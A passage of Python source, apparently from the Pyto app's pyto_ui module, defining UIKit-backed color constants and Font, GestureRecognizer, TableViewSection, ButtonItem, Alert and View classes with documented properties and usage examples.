COLOR_SYSTEM_BACKGROUND = Color(ui_constants.COLOR_SYSTEM_BACKGROUND)
""" The color for the main background of your interface. """
COLOR_SECONDARY_SYSTEM_BACKGROUND = Color(
ui_constants.COLOR_SECONDARY_SYSTEM_BACKGROUND
)
""" The color for content layered on top of the main background. """
COLOR_TERTIARY_SYSTEM_BACKGROUND = Color(ui_constants.COLOR_TERTIARY_SYSTEM_BACKGROUND)
""" The color for content layered on top of secondary backgrounds. """
COLOR_SYSTEM_GROUPED_BACKGROUND = Color(ui_constants.COLOR_SYSTEM_GROUPED_BACKGROUND)
""" The color for the main background of your grouped interface. """
COLOR_SECONDARY_GROUPED_BACKGROUND = Color(
ui_constants.COLOR_SECONDARY_GROUPED_BACKGROUND
)
""" The color for content layered on top of the main background of your grouped interface. """
COLOR_TERTIARY_GROUPED_BACKGROUND = Color(
ui_constants.COLOR_TERTIARY_GROUPED_BACKGROUND
)
""" The color for content layered on top of secondary backgrounds of your grouped interface. """
COLOR_SEPARATOR = Color(ui_constants.COLOR_SEPARATOR)
""" The color for thin borders or divider lines that allows some underlying content to be visible. """
COLOR_OPAQUE_SEPARATOR = Color(ui_constants.COLOR_OPAQUE_SEPARATOR)
""" The color for borders or divider lines that hide any underlying content. """
COLOR_LINK = Color(ui_constants.COLOR_LINK)
""" The color for links. """
COLOR_DARK_TEXT = Color(ui_constants.COLOR_DARK_TEXT)
""" The nonadaptable system color for text on a light background. """
COLOR_LIGHT_TEXT = Color(ui_constants.COLOR_LIGHT_TEXT)
""" The nonadaptable system color for text on a dark background. """
COLOR_SYSTEM_BLUE = Color(ui_constants.COLOR_SYSTEM_BLUE)
""" A blue color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_GREEN = Color(ui_constants.COLOR_SYSTEM_GREEN)
""" A green color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_INDIGO = Color(ui_constants.COLOR_SYSTEM_INDIGO)
""" An indigo color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_ORANGE = Color(ui_constants.COLOR_SYSTEM_ORANGE)
""" An orange color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_PINK = Color(ui_constants.COLOR_SYSTEM_PINK)
""" A pink color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_PURPLE = Color(ui_constants.COLOR_SYSTEM_PURPLE)
""" A purple color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_RED = Color(ui_constants.COLOR_SYSTEM_RED)
""" A red color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_TEAL = Color(ui_constants.COLOR_SYSTEM_TEAL)
""" A teal color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_YELLOW = Color(ui_constants.COLOR_SYSTEM_YELLOW)
""" A yellow color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_GRAY = Color(ui_constants.COLOR_SYSTEM_GRAY)
""" The base gray color. """
COLOR_SYSTEM_GRAY2 = Color(ui_constants.COLOR_SYSTEM_GRAY2)
""" A second-level shade of grey. """
COLOR_SYSTEM_GRAY3 = Color(ui_constants.COLOR_SYSTEM_GRAY3)
""" A third-level shade of grey. """
COLOR_SYSTEM_GRAY4 = Color(ui_constants.COLOR_SYSTEM_GRAY4)
""" A fourth-level shade of grey. """
COLOR_SYSTEM_GRAY5 = Color(ui_constants.COLOR_SYSTEM_GRAY5)
""" A fifth-level shade of grey. """
COLOR_SYSTEM_GRAY6 = Color(ui_constants.COLOR_SYSTEM_GRAY6)
""" A sixth-level shade of grey. """
COLOR_CLEAR = Color(ui_constants.COLOR_CLEAR)
""" A color object with grayscale and alpha values that are both 0.0. """
COLOR_BLACK = Color(ui_constants.COLOR_BLACK)
""" A color object in the sRGB color space with a grayscale value of 0.0 and an alpha value of 1.0. """
COLOR_BLUE = Color(ui_constants.COLOR_BLUE)
""" A color object with RGB values of 0.0, 0.0, and 1.0 and an alpha value of 1.0. """
COLOR_BROWN = Color(ui_constants.COLOR_BROWN)
""" A color object with RGB values of 0.6, 0.4, and 0.2 and an alpha value of 1.0. """
COLOR_CYAN = Color(ui_constants.COLOR_CYAN)
""" A color object with RGB values of 0.0, 1.0, and 1.0 and an alpha value of 1.0. """
COLOR_DARK_GRAY = Color(ui_constants.COLOR_DARK_GRAY)
""" A color object with a grayscale value of 1/3 and an alpha value of 1.0. """
COLOR_GRAY = Color(ui_constants.COLOR_GRAY)
""" A color object with a grayscale value of 0.5 and an alpha value of 1.0. """
COLOR_GREEN = Color(ui_constants.COLOR_GREEN)
""" A color object with RGB values of 0.0, 1.0, and 0.0 and an alpha value of 1.0. """
COLOR_LIGHT_GRAY = Color(ui_constants.COLOR_LIGHT_GRAY)
""" A color object with a grayscale value of 2/3 and an alpha value of 1.0. """
COLOR_MAGENTA = Color(ui_constants.COLOR_MAGENTA)
""" A color object with RGB values of 1.0, 0.0, and 1.0 and an alpha value of 1.0. """
COLOR_ORANGE = Color(ui_constants.COLOR_ORANGE)
""" A color object with RGB values of 1.0, 0.5, and 0.0 and an alpha value of 1.0. """
COLOR_PURPLE = Color(ui_constants.COLOR_PURPLE)
""" A color object with RGB values of 0.5, 0.0, and 0.5 and an alpha value of 1.0. """
COLOR_RED = Color(ui_constants.COLOR_RED)
""" A color object with RGB values of 1.0, 0.0, and 0.0 and an alpha value of 1.0. """
COLOR_WHITE = Color(ui_constants.COLOR_WHITE)
""" A color object with a grayscale value of 1.0 and an alpha value of 1.0. """
COLOR_YELLOW = Color(ui_constants.COLOR_YELLOW)
""" A color object with RGB values of 1.0, 1.0, and 0.0 and an alpha value of 1.0. """
# MARK: - Font
class Font:
"""
A ``Font`` object represents a font (with name and size) to be used on labels, buttons, text views etc.
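Example (a minimal sketch; ``Label`` and its ``text``/``font`` properties are assumed from the rest of this module):
.. highlight:: python
.. code-block:: python
    import pyto_ui as ui

    label = ui.Label()
    label.text = "Hello"
    label.font = ui.Font("Courier", 17)
    # A Dynamic Type system font:
    label.font = ui.Font.font_with_style(ui.FONT_TEXT_STYLE_HEADLINE)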
"""
__ui_font__ = None
def __init__(self, name: str, size: float):
"""
Initializes a font with given name and size.
:param name: The fully specified name of the font. This name incorporates both the font family name and the specific style information for the font.
:param size: The size (in points) to which the font is scaled. This value must be greater than 0.0.
"""
if name is None and size is None:
return
self.__ui_font__ = __UIFont__.fontWithName(name, size=CGFloat(size))
def __repr__(self):
return str(self.__ui_font__.description)
def with_size(self, size: float) -> Font:
"""
Returns a font object that is the same as the receiver but which has the specified size instead.
:param size: The desired size (in points) of the new font object. This value must be greater than 0.0.
:rtype: Font
"""
font = self.__class__(None, None)
font.__ui_font__ = self.__ui_font__.fontWithSize(CGFloat(size))
return font
@classmethod
def font_names_for_family_name(cls, name: str) -> List[str]:
"""
Returns an array of font names available in a particular font family.
:param name: The name of the font family. Use the :func:`~pyto_ui.font_family_names` function to get an array of the available font family names on the system.
:rtype: List[str]
"""
names = __UIFont__.fontNamesForFamilyName(name)
py_names = []
for name in names:
py_names.append(str(name))
return py_names
@classmethod
def system_font_of_size(cls, size: float) -> Font:
"""
Returns the font object used for standard interface items in the specified size.
:param size: The size (in points) to which the font is scaled. This value must be greater than 0.0.
:rtype: Font
"""
font = cls(None, None)
font.__ui_font__ = __UIFont__.systemFontOfSize(CGFloat(size))
return font
@classmethod
def italic_system_font_of_size(cls, size: float) -> Font:
"""
Returns the font object used for standard interface items that are rendered in italic type in the specified size.
:param size: The size (in points) for the font. This value must be greater than 0.0.
:rtype: Font
"""
font = cls(None, None)
font.__ui_font__ = __UIFont__.italicSystemFontOfSize(CGFloat(size))
return font
@classmethod
def bold_system_font_of_size(cls, size: float) -> Font:
"""
Returns the font object used for standard interface items that are rendered in boldface type in the specified size
:param size: The size (in points) for the font. This value must be greater than 0.0.
:rtype: Font
"""
font = cls(None, None)
font.__ui_font__ = __UIFont__.boldSystemFontOfSize(CGFloat(size))
return font
@classmethod
def font_with_style(cls, style: FONT_TEXT_STYLE) -> Font:
"""
Returns an instance of the system font for the specified text style and scaled appropriately for the user's selected content size category.
:param style: The text style for which to return a font. See `Font Text Style <constants.html#font-text-style>`_ constants for possible values.
:rtype: Font
"""
font = cls(None, None)
font.__ui_font__ = __UIFont__.preferredFontForTextStyle(style)
return font
# MARK: - Gesture Recognizer
class GestureRecognizer:
"""
A gesture-recognizer object—or, simply, a gesture recognizer—decouples the logic for recognizing a sequence of touches (or other input) and acting on that recognition. When one of these objects recognizes a common gesture or, in some cases, a change in the gesture, it sends an action message to each designated target object.
The ``type`` initializer parameter specifies the kind of gesture to recognize. See `Gesture Type <constants.html#gesture-type>`_ constants for possible values.
When the gesture begins, changes or is cancelled, ``action`` is called with the gesture recognizer as parameter. You can then access the location and the state from it.
Example:
.. highlight:: python
.. code-block:: python
'''
Move a circle with finger.
'''
import pyto_ui as ui
view = ui.View()
view.background_color = ui.COLOR_SYSTEM_BACKGROUND
circle = ui.View()
circle.size = (50, 50)
circle.center = (view.width/2, view.height/2)
circle.flexible_margins = True
circle.corner_radius = 25
circle.background_color = ui.COLOR_LABEL
view.add_subview(circle)
def move(sender: ui.GestureRecognizer):
if sender.state == ui.GESTURE_STATE_CHANGED:
circle.center = sender.location
gesture = ui.GestureRecognizer(ui.GESTURE_TYPE_PAN)
gesture.action = move
view.add_gesture_recognizer(gesture)
ui.show_view(view)
"""
__py_gesture__ = None
def __init__(
self, type: GESTURE_TYPE, action: Callable[[GestureRecognizer], None] = None
):
if type.objc_class == __PyGestureRecognizer__:
self.__py_gesture__ = type
else:
self.__py_gesture__ = __PyGestureRecognizer__.newRecognizerWithType(type)
self.__py_gesture__.managedValue = _values.value(self)
if action is not None:
self.action = action
def __repr__(self):
return str(self.__py_gesture__.managed.description)
__x__ = []
__y__ = []
@property
def x(self) -> float:
"""
(Read Only) Returns the X position of the gesture in its container view.
:rtype: float
"""
try:
return self.__x__[0]
except IndexError:
return None
@property
def y(self) -> float:
"""
(Read Only) Returns the Y position of the gesture in its container view.
"""
try:
return self.__y__[0]
except IndexError:
return None
@property
def location(self) -> Tuple[float, float]:
"""
(Read Only) Returns a tuple with the X and the Y position of the gesture in its container view.
:rtype: Tuple[float, float]
"""
tup = (self.x, self.y)
if tup == (None, None):
return None
else:
return tup
@property
def view(self) -> "View":
"""
(Read Only) Returns the view associated with the gesture.
:rtype: View
"""
view = self.__py_gesture__.view
if view is None:
return None
else:
_view = View()
_view.__py_view__ = view
return _view
@property
def enabled(self) -> bool:
"""
A boolean indicating whether the gesture recognizer is enabled.
:rtype: bool
"""
return self.__py_gesture__.enabled
@enabled.setter
def enabled(self, new_value: bool):
self.__py_gesture__.enabled = new_value
__number_of_touches__ = None
@property
def number_of_touches(self) -> int:
"""
(Read Only) Returns the number of touches involved in the gesture represented by the receiver.
:rtype: int
"""
if self.__number_of_touches__ is not None:
return self.__number_of_touches__
else:
return self.__py_gesture__.numberOfTouches
__state__ = None
@property
def state(self) -> GESTURE_STATE:
"""
(Read Only) The current state of the gesture recognizer.
:rtype: `Gesture State <constants.html#gesture-state>`_
"""
if self.__state__ is not None:
return self.__state__
else:
return self.__py_gesture__.state
@property
def requires_exclusive_touch_type(self) -> bool:
"""
A Boolean indicating whether the gesture recognizer considers touches of different types simultaneously.
:rtype: bool
"""
return self.__py_gesture__.requiresExclusiveTouchType
@requires_exclusive_touch_type.setter
def requires_exclusive_touch_type(self, new_value: bool):
self.__py_gesture__.requiresExclusiveTouchType = new_value
@property
def delays_touches_ended(self) -> bool:
"""
A Boolean value determining whether the receiver delays sending touches in an end phase to its view.
:rtype: bool
"""
return self.__py_gesture__.delaysTouchesEnded
@delays_touches_ended.setter
def delays_touches_ended(self, new_value: bool):
self.__py_gesture__.delaysTouchesEnded = new_value
@property
def delays_touches_began(self) -> bool:
"""
A Boolean value determining whether the receiver delays sending touches in a begin phase to its view.
:rtype: bool
"""
return self.__py_gesture__.delaysTouchesBegan
@delays_touches_began.setter
def delays_touches_began(self, new_value: bool):
self.__py_gesture__.delaysTouchesBegan = new_value
@property
def cancels_touches_in_view(self) -> bool:
"""
A Boolean value affecting whether touches are delivered to a view when a gesture is recognized.
:rtype: bool
"""
return self.__py_gesture__.cancelsTouchesInView
@cancels_touches_in_view.setter
def cancels_touches_in_view(self, new_value: bool):
self.__py_gesture__.cancelsTouchesInView = new_value
@property
def allowed_touch_types(self) -> List[TOUCH_TYPE]:
"""
An array of touch types used to distinguish type of touches. For possible values, see ``Touch Type`` constants.
:rtype: List[`Touch Type <constants.html#touch-type>`_]
"""
return self.__py_gesture__.allowedTouchTypes
@allowed_touch_types.setter
def allowed_touch_types(self, new_value: List[TOUCH_TYPE]):
self.__py_gesture__.allowedTouchTypes = new_value
@property
def action(self) -> Callable[[GestureRecognizer], None]:
"""
A function called to handle the gesture. Takes the sender gesture recognizer as parameter.
:rtype: Callable[[GestureRecognizer], None]
"""
action = self.__py_gesture__.action
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@action.setter
def action(self, new_value: Callable[[GestureRecognizer], None]):
if new_value is None:
self.__py_gesture__.action = None
else:
self.__py_gesture__.action = _values.value(new_value)
# MARK: - Table View Section
class TableViewSection:
"""
An object representing a section in a Table View.
A section has a title and a list of the cells it contains.
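Example (a minimal sketch; ``TableView``, ``TableViewCell`` and ``show_view`` are defined elsewhere in this module, while the cell's ``text_label`` and the table view's ``sections`` attributes are assumed here):
.. highlight:: python
.. code-block:: python
    import pyto_ui as ui

    cells = []
    for fruit in ("Apple", "Banana", "Cherry"):
        cell = ui.TableViewCell()
        cell.text_label.text = fruit  # 'text_label' is assumed
        cells.append(cell)

    def did_select(section: ui.TableViewSection, index: int):
        print(section.cells[index].text_label.text)

    section = ui.TableViewSection("Fruits", cells)
    section.did_select_cell = did_select

    table_view = ui.TableView()
    table_view.sections = [section]  # 'sections' is assumed
    ui.show_view(table_view)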
"""
__py_section__ = None
def __init__(self, title: str, cells: List["TableViewCell"]):
self.__py_section__ = __PyTableViewSection__.new()
self.__py_section__.managedValue = _values.value(self)
self.title = title
self.cells = cells
@property
def table_view(self) -> "TableView":
"""
(Read Only) Returns the Table view associated with the section.
:rtype: TableView
"""
table_view = self.__py_section__.tableView
if table_view is None:
return None
else:
py_table_view = TableView()
py_table_view.__py_view__ = table_view
return py_table_view
@property
def title(self) -> str:
"""
The title of the section displayed on screen.
:rtype: str
"""
return str(self.__py_section__.title)
@title.setter
def title(self, new_value: str):
self.__py_section__.title = new_value
@property
def cells(self) -> List["TableViewCell"]:
"""
Cells contained in the section. After setting a value, the section will be reloaded automatically.
:rtype: List[TableViewCell]
"""
cells = self.__py_section__.cells
py_cells = []
for cell in cells:
py_cell = TableViewCell()
py_cell.__py_view__ = cell
py_cells.append(py_cell)
return py_cells
@cells.setter
def cells(self, new_value: List["TableViewCell"]):
cells = []
for cell in new_value:
cells.append(cell.__py_view__)
self.__py_section__.cells = cells
@property
def did_select_cell(self) -> Callable[[TableViewSection, int], None]:
"""
A function called when a cell contained in the section is selected. Takes the sender section and the selected cell's index as parameters.
:rtype: Callable[[TableViewSection, int], None]
"""
action = self.__py_section__.didSelectCell
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_select_cell.setter
def did_select_cell(self, new_value: Callable[[TableViewSection, int], None]):
if new_value is None:
self.__py_section__.didSelectCell = None
else:
self.__py_section__.didSelectCell = _values.value(new_value)
@property
def did_tap_cell_accessory_button(self) -> Callable[[TableViewSection, int], None]:
"""
A function called when the accessory button of a cell contained in the section is pressed. Takes the sender section and the cell's index as parameters.
:rtype: Callable[[TableViewSection, int], None]
"""
action = self.__py_section__.accessoryButtonTapped
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_tap_cell_accessory_button.setter
def did_tap_cell_accessory_button(
self, new_value: Callable[[TableViewSection, int], None]
):
if new_value is None:
self.__py_section__.accessoryButtonTapped = None
else:
self.__py_section__.accessoryButtonTapped = _values.value(new_value)
@property
def did_delete_cell(self) -> Callable[[TableViewSection, int], None]:
"""
A function called when a cell contained in the section is deleted. Takes the sender section and the deleted cell's index as parameters.
This function should be used to remove the data corresponding to the cell from the database.
:rtype: Callable[[TableViewSection, int], None]
"""
action = self.__py_section__.didDeleteCell
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_delete_cell.setter
def did_delete_cell(self, new_value: Callable[[TableViewSection, int], None]):
if new_value is None:
self.__py_section__.didDeleteCell = None
else:
self.__py_section__.didDeleteCell = _values.value(new_value)
@property
def did_move_cell(self) -> Callable[[TableViewSection, int, int], None]:
"""
A function called when a cell contained in the section is moved. Takes the sender section, the moved cell's index and the destination index as parameters.
This function should be used to move the data corresponding to the cell in the database.
:rtype: Callable[[TableViewSection, int, int], None]
"""
action = self.__py_section__.didMoveCell
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_move_cell.setter
def did_move_cell(self, new_value: Callable[[TableViewSection, int, int], None]):
if new_value is None:
self.__py_section__.didMoveCell = None
else:
self.__py_section__.didMoveCell = _values.value(new_value)
# MARK: - Button Item
class ButtonItem:
"""
A special kind of button that can be placed in the view's navigation bar. It can have a title, an image, or a system item.
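Example (a minimal sketch; the view's ``button_items`` attribute is assumed from the rest of this module):
.. highlight:: python
.. code-block:: python
    import pyto_ui as ui

    def share_tapped(sender: ui.ButtonItem):
        print("Share tapped")

    item = ui.ButtonItem(system_item=ui.SYSTEM_ITEM_ACTION)
    item.action = share_tapped

    view = ui.View()
    view.button_items = [item]  # 'button_items' is assumed
    ui.show_view(view)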
"""
__py_item__ = None
def __init__(
self,
title: str = None,
image: "Image" = None,
system_item: SYSTEM_ITEM = None,
style: BUTTON_ITEM_STYLE = __v__("BUTTON_ITEM_STYLE_PLAIN"),
):
if style == "BUTTON_ITEM_STYLE_PLAIN":
style = BUTTON_ITEM_STYLE_PLAIN
if system_item is not None:
self.__py_item__ = __PyButtonItem__.alloc().initWithSystemItem(system_item)
else:
self.__py_item__ = __PyButtonItem__.alloc().initWithStyle(style)
self.__py_item__.managedValue = _values.value(self)
self.title = title
self.image = image
def __repr__(self):
return str(self.__py_item__.managed.description)
@property
def title(self) -> str:
"""
The title of the button displayed on screen.
:rtype: str
"""
title = self.__py_item__.title
if title is not None:
return str(title)
else:
return None
@title.setter
def title(self, new_value: str):
self.__py_item__.title = new_value
@property
def image(self) -> "Image":
"""
A ``PIL`` image object displayed on screen. May also be an ``UIKit`` ``UIImage`` symbol. See :func:`~pyto_ui.image_with_system_name`.
:rtype: PIL.Image.Image
"""
ui_image = self.__py_item__.image
if ui_image is None:
return None
elif ui_image.symbolImage:
return ui_image
else:
return __pil_image_from_ui_image__(ui_image)
@image.setter
def image(self, new_value: "Image"):
if new_value is None:
self.__py_item__.image = None
elif "objc_class" in dir(new_value) and new_value.objc_class == UIImage:
self.__py_item__.image = new_value
else:
self.__py_item__.image = __ui_image_from_pil_image__(new_value)
@property
def enabled(self) -> bool:
"""
A boolean indicating whether the button is enabled.
:rtype: bool
"""
return self.__py_item__.enabled
@enabled.setter
def enabled(self, new_value: bool):
self.__py_item__.enabled = new_value
@property
def style(self) -> BUTTON_ITEM_STYLE:
"""
The button item style. See `Button Item Style <constants.html#button-item-style>`_ constants for possible values.
:rtype: `Button Item Style <constants.html#button-item-style>`_
"""
return self.__py_item__.style
@style.setter
def style(self, new_value: BUTTON_ITEM_STYLE):
self.__py_item__.style = new_value
@property
def action(self) -> Callable[[ButtonItem], None]:
"""
A function called when the button item is pressed. Takes the button item as parameter.
:rtype: Callable[[ButtonItem], None]
"""
action = self.__py_item__.action
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@action.setter
def action(self, new_value: Callable[[ButtonItem], None]):
if new_value is None:
self.__py_item__.action = None
else:
self.__py_item__.action = _values.value(new_value)
if "widget" not in os.environ:
# MARK: - Alert
class Alert:
"""
A class representing an alert.
Example:
.. highlight:: python
.. code-block:: python
from pyto_ui import Alert
alert = Alert("Hello", "Hello World!")
alert.add_action("Ok")
alert.add_cancel_action("Cancel")
if (alert.show() == "Ok"):
print("Good Bye!")
"""
__pyAlert__ = None
def __init__(self, title: str, message: str):
"""
Creates an alert.
:param title: The title of the alert.
:param message: The message of the alert.
"""
self.__pyAlert__ = __PyAlert__.alloc().init()
self.__pyAlert__.title = title
self.__pyAlert__.message = message
__actions__ = []
def add_action(self, title: str):
"""
Adds an action with given title.
:param title: The title of the action.
"""
self.__pyAlert__.addAction(title)
def add_destructive_action(self, title: str):
"""
Adds a destructive action with given title.
:param title: The title of the action.
"""
self.__pyAlert__.addDestructiveAction(title)
def add_cancel_action(self, title: str):
"""
Adds a cancel action with the given title. Only one cancel action can be added.
:param title: The title of the action.
"""
if not self.__pyAlert__.addCancelAction(title):
raise ValueError("There is already a cancel action.")
def show(self) -> str:
"""
Shows alert.
Returns the title of the selected action.
:rtype: str
"""
script_path = None
try:
script_path = threading.current_thread().script_path
except AttributeError:
pass
return self.__pyAlert__._show(script_path)
###############
# MARK: - View Classes
###############
class View:
"""
An object that manages the content for a rectangular area on the screen.
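Example (a minimal usage sketch using classes defined in this module):
.. highlight:: python
.. code-block:: python
import pyto_ui as ui
view = ui.View()
view.size = (320, 480)
label = ui.Label("Hello")
label.size_to_fit()
label.center = (view.width/2, view.height/2)
view.add_subview(label)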
"""
__py_view__ = None
def __init__(self):
self.__py_view__ = __PyView__.newView()
def __repr__(self):
return str(self.__py_view__.managed.description)
def __getitem__(self, item):
return self.subview_with_name(item)
@property
def title(self) -> str:
"""
If this view is directly presented, the top bar will show this view's title.
:rtype: str
"""
title = self.__py_view__.title
if title is None:
return title
else:
return str(title)
@title.setter
def title(self, new_value: str):
self.__py_view__.title = new_value
@property
def name(self) -> str:
"""
The name identifying the view. To access a subview with its name, you can use the :func:`~pyto_ui.View.subview_with_name` function. :class:`~pyto_ui.View` is also subscriptable, so you can do something like that:
.. highlight:: python
.. code-block:: python
import pyto_ui as ui
button = ui.Button()
button.name = "Button"
view = ui.View()
view.add_subview(button)
view["Button"] # -> Button object
:rtype: str
"""
name = self.__py_view__.name
if name is None:
return name
else:
return str(name)
@name.setter
def name(self, new_value: str):
self.__py_view__.name = new_value
def close(self):
"""
Closes the view, if the receiver object is the root view presented to the user.
"""
self.__py_view__.close()
def push(self, view: View):
"""
Presents the given additional view on top of the receiver.
:param view: The view to present.
"""
self.__py_view__.pushView(view.__py_view__)
def pop(self):
"""
Pops the visible view controller from the navigation controller.
"""
self.__py_view__.pop()
@property
def navigation_bar_hidden(self) -> bool:
"""
A boolean indicating whether the Navigation Bar of the View should be hidden.
:rtype: bool
"""
return self.__py_view__.navigationBarHidden
@navigation_bar_hidden.setter
def navigation_bar_hidden(self, new_value: bool):
self.__py_view__.navigationBarHidden = new_value
@property
def x(self) -> float:
"""
The x-coordinate of the view.
:rtype: float
"""
return self.__py_view__.x
@x.setter
def x(self, new_value: float):
self.__py_view__.x = new_value
@property
def y(self) -> float:
"""
The y-coordinate of the view.
:rtype: float
"""
return self.__py_view__.y
@y.setter
def y(self, new_value: float):
self.__py_view__.y = new_value
@property
def width(self) -> float:
"""
The width of the view.
:rtype: float
"""
return self.__py_view__.width
@width.setter
def width(self, new_value: float):
self.__py_view__.width = new_value
@property
def height(self) -> float:
"""
The height of the view.
:rtype: float
"""
return self.__py_view__.height
@height.setter
def height(self, new_value: float):
self.__py_view__.height = new_value
@property
def center_x(self) -> float:
"""
The center x-coordinate of the view's frame rectangle. Setting this value updates the ``frame`` property appropriately.
:rtype: float
"""
return self.__py_view__.centerX
@center_x.setter
def center_x(self, new_value: float):
self.__py_view__.centerX = new_value
@property
def center_y(self) -> float:
"""
The center y-coordinate of the view's frame rectangle. Setting this value updates the ``frame`` property appropriately.
:rtype: float
"""
return self.__py_view__.centerY
@center_y.setter
def center_y(self, new_value: float):
self.__py_view__.centerY = new_value
@property
def center(self) -> Tuple[float, float]:
"""
The center point of the view's frame rectangle. Setting this value updates the ``frame`` property appropriately.
This value is a tuple with X and Y coordinates.
:rtype: Tuple[float, float]
"""
return (self.center_x, self.center_y)
@center.setter
def center(self, new_value: Tuple[float, float]):
self.center_x, self.center_y = new_value
@property
def size(self) -> Tuple[float, float]:
"""
A size that specifies the height and width of the rectangle.
This value is a tuple with height and width values.
:rtype: Tuple[float, float]
"""
return (self.width, self.height)
@size.setter
def size(self, new_value: Tuple[float, float]):
self.width, self.height = new_value
@property
def origin(self) -> Tuple[float, float]:
"""
A point that specifies the coordinates of the view's rectangle’s origin.
This value is a tuple with X and Y coordinates.
:rtype: Tuple[float, float]
"""
return (self.x, self.y)
@origin.setter
def origin(self, new_value: Tuple[float, float]):
self.x, self.y = new_value
@property
def frame(self) -> Tuple[float, float, float, float]:
"""
The frame rectangle, which describes the view’s location and size in its superview’s coordinate system.
This value is a tuple with X, Y, Width and Height values.
:rtype: Tuple[float, float, float, float]
"""
return (self.x, self.y, self.width, self.height)
@frame.setter
def frame(self, new_value: Tuple[float, float, float, float]):
self.x, self.y, self.width, self.height = new_value
@property
def __flexible_width__(self) -> bool:
return self.__py_view__.flexibleWidth
@__flexible_width__.setter
def __flexible_width__(self, new_value: bool):
self.__py_view__.flexibleWidth = new_value
@property
def __flexible_height__(self) -> bool:
return self.__py_view__.flexibleHeight
@__flexible_height__.setter
def __flexible_height__(self, new_value: bool):
self.__py_view__.flexibleHeight = new_value
@property
def __flexible_left_margin__(self) -> bool:
return self.__py_view__.flexibleLeftMargin
@__flexible_left_margin__.setter
def __flexible_left_margin__(self, new_value: bool):
self.__py_view__.flexibleLeftMargin = new_value
@property
def __flexible_right_margin__(self) -> bool:
return self.__py_view__.flexibleRightMargin
@__flexible_right_margin__.setter
def __flexible_right_margin__(self, new_value: bool):
self.__py_view__.flexibleRightMargin = new_value
@property
def __flexible_top_margin__(self) -> bool:
return self.__py_view__.flexibleTopMargin
@__flexible_top_margin__.setter
def __flexible_top_margin__(self, new_value: bool):
self.__py_view__.flexibleTopMargin = new_value
@property
def __flexible_bottom_margin__(self) -> bool:
return self.__py_view__.flexibleBottomMargin
@__flexible_bottom_margin__.setter
def __flexible_bottom_margin__(self, new_value: bool):
self.__py_view__.flexibleBottomMargin = new_value
@property
def flex(self) -> List[AUTO_RESIZING]:
"""
A list that determines how the receiver resizes itself when its superview’s bounds change. See `Auto Resizing <constants.html#auto-resizing>`_ constants for possible values.
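Example (a minimal sketch making the view track its superview's size):
.. highlight:: python
.. code-block:: python
import pyto_ui as ui
view = ui.View()
view.flex = [ui.FLEXIBLE_WIDTH, ui.FLEXIBLE_HEIGHT]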
:rtype: List[`Auto Resizing <constants.html#auto-resizing>`_]
"""
a = []
if self.__flexible_width__:
a.append(FLEXIBLE_WIDTH)
if self.__flexible_height__:
a.append(FLEXIBLE_HEIGHT)
if self.__flexible_bottom_margin__:
a.append(FLEXIBLE_BOTTOM_MARGIN)
if self.__flexible_top_margin__:
a.append(FLEXIBLE_TOP_MARGIN)
if self.__flexible_left_margin__:
a.append(FLEXIBLE_LEFT_MARGIN)
if self.__flexible_right_margin__:
a.append(FLEXIBLE_RIGHT_MARGIN)
return a
@flex.setter
def flex(self, new_value: List[AUTO_RESIZING]):
self.__flexible_width__, self.__flexible_height__, self.__flexible_top_margin__, self.__flexible_bottom_margin__, self.__flexible_left_margin__, self.__flexible_right_margin__ = (
(FLEXIBLE_WIDTH in new_value),
(FLEXIBLE_HEIGHT in new_value),
(FLEXIBLE_TOP_MARGIN in new_value),
(FLEXIBLE_BOTTOM_MARGIN in new_value),
(FLEXIBLE_LEFT_MARGIN in new_value),
(FLEXIBLE_RIGHT_MARGIN in new_value),
)
def subview_with_name(self, name) -> View:
"""
Returns the subview with the given name.
Raises ``NameError`` if no view is found.
:rtype: View
"""
for view in self.subviews:
if view.name == name:
return view
raise NameError(f"No subview named '{name}'")
@property
def subviews(self) -> List[View]:
"""
(Read Only) A list of the view's children.
See also :func:`~pyto_ui.View.add_subview`.
:rtype: List[View]
"""
views = self.__py_view__.subviews
if views is None or len(views) == 0:
return []
else:
_views = []
for view in views:
ui = sys.modules["pyto_ui"]
_class = getattr(ui, str(view.objc_class.pythonName))
_view = _class()
_view.__py_view__ = view
_views.append(_view)
return _views
@property
def superview(self) -> View:
"""
(Read Only) The parent view containing the receiver view.
:rtype: View
"""
superview = self.__py_view__.superView
if superview is None:
return None
else:
ui = sys.modules["pyto_ui"]
_class = getattr(ui, str(superview.objc_class.pythonName))
view = _class()
view.__py_view__ = superview
return view
@property
def background_color(self) -> Color:
"""
The background color of the view.
:rtype: Color
"""
c = self.__py_view__.backgroundColor
if c is None:
return None
else:
return Color(c)
@background_color.setter
def background_color(self, new_value: Color):
if new_value is None:
self.__py_view__.backgroundColor = None
else:
self.__py_view__.backgroundColor = new_value.__py_color__
@property
def hidden(self) -> bool:
"""
A boolean indicating whether the view is visible or not.
:rtype: bool
"""
return self.__py_view__.hidden
@hidden.setter
def hidden(self, new_value: bool):
self.__py_view__.hidden = new_value
@property
def alpha(self) -> float:
"""
The opacity of the view.
:rtype: float
"""
return self.__py_view__.alpha
@alpha.setter
def alpha(self, new_value: float):
self.__py_view__.alpha = new_value
@property
def opaque(self) -> bool:
"""
A boolean indicating whether the view is opaque or not. Setting to ``True`` should prevent the view from having a transparent background.
:rtype: bool
"""
return self.__py_view__.opaque
@opaque.setter
def opaque(self, new_value: bool):
self.__py_view__.opaque = new_value
@property
def tint_color(self) -> Color:
"""
The tint color of the view. If set to ``None``, the tint color will be inherited from the superview. The tint color affects some views like ``Button`` for title color, ``TextView`` for cursor color, etc.
:rtype: Color
"""
c = self.__py_view__.tintColor
if c is None:
return None
else:
return Color(c)
@tint_color.setter
def tint_color(self, new_value: Color):
if new_value is None:
self.__py_view__.tintColor = None
else:
self.__py_view__.tintColor = new_value.__py_color__
@property
def user_interaction_enabled(self) -> bool:
"""
